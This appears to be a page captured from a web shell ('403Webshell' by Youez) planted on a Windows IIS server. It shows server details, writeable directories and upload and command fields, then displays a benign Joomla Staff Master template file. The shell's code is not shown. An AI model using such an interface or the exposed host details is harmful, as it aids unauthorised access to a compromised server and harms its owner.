403Webshell
Server IP : 195.130.67.5  /  Your IP : 216.73.217.154
Web Server : Microsoft-IIS/10.0
System : Windows NT WEBSERVER1 10.0 build 17763 (Windows Server 2016) i586
User : IUSR ( 0)
PHP Version : 7.4.19
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  C:/inetpub/wwwroot/icd/components/com_staffmaster/views/staff/tmpl/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : C:/inetpub/wwwroot/icd/components/com_staffmaster/views/staff/tmpl/default.php
<?php

/**

 * File: default.php

 * 		 Actual HTML Output

 *

 * Staff Master 0_7_5_5

 *

 * Staff Master - Staff Members and Departments Manager

 *

 * @version 0.7.5.5

 * @package StaffMaster_0_7_5_5

 * @subpackage: view_staff

 * @copyright (C) 2007-2008 Travis Hubbard

 * @license http://www.gnu.org/licenses/  GNU/GPL v3

 * @link http://www.systemsunited.net/

 **/

defined( '_JEXEC' ) or die( 'Restricted access' );



?>

<div id="staff_container">



	<div id="staff_header">



		<h1 <?php echo $this->page_title_color_html ?> > <?php echo $this->params->page_title ?> </h1>



	</div>



	<a name="staff_<?php echo $this->staff_member->alias?>" ></a>

	<div class="staff_wrapper" id="staff_wrapper_<?php echo $this->staff_member->id ?>">



		<div class="staff_member">  <!-- begin staff_member content -->


			<div class="<?php echo $this->staff_name_class ?>">



				<p <?php echo $this->staff_name_color_html ?> >



					<?php echo $this->staff_html['name'][ $this->staff_member->alias ] ?>



					<?php if( !$this->params->title_in_bio )  { echo ' &nbsp; - &nbsp; ' . $this->staff_html['title'][ $this->staff_member->alias ]; } ?>



				</p>



			</div>


			<div id="staff_details">
			<div class="<?php echo $this->staff_image_class ?>">

				<?php 
						echo $this->staff_html['image'][ $this->staff_member->alias ];
				?>
				
			</div>
			<div id="contact_info">
				<p id="contact_details">
				<?php
						echo $this->staff_html['contact'][ $this->staff_member->alias ];
				?>


				</p>
			
			</div>
		</div>





			
			
			
		
			
				




			



			<div class="<?php echo $this->staff_bio_class ?>" >

				<?php



					if( $this->params->title_in_bio )  {



						echo '<p>' . $this->staff_html['title'][ $this->staff_member->alias ] . '</p>';



					}



				?>

				<p <?php echo $this->staff_bio_color_html ?>>



					<?php echo $this->staff_html['bio'][ $this->staff_member->alias ] ?>



				</p>



			</div>



		</div>  <!-- End staff_member -->



	</div>



<?php if( $this->show_sm_link ): ?>

	<div id="staff_master_link">Powered By: <a href="http://www.systemsunited.net/" target="_blank">Staff Master</a> v<?php echo $this->params->version ?></div>

<?php endif; ?>

</div>

Youez - 2016 - github.com/yon3zu
LinuXploit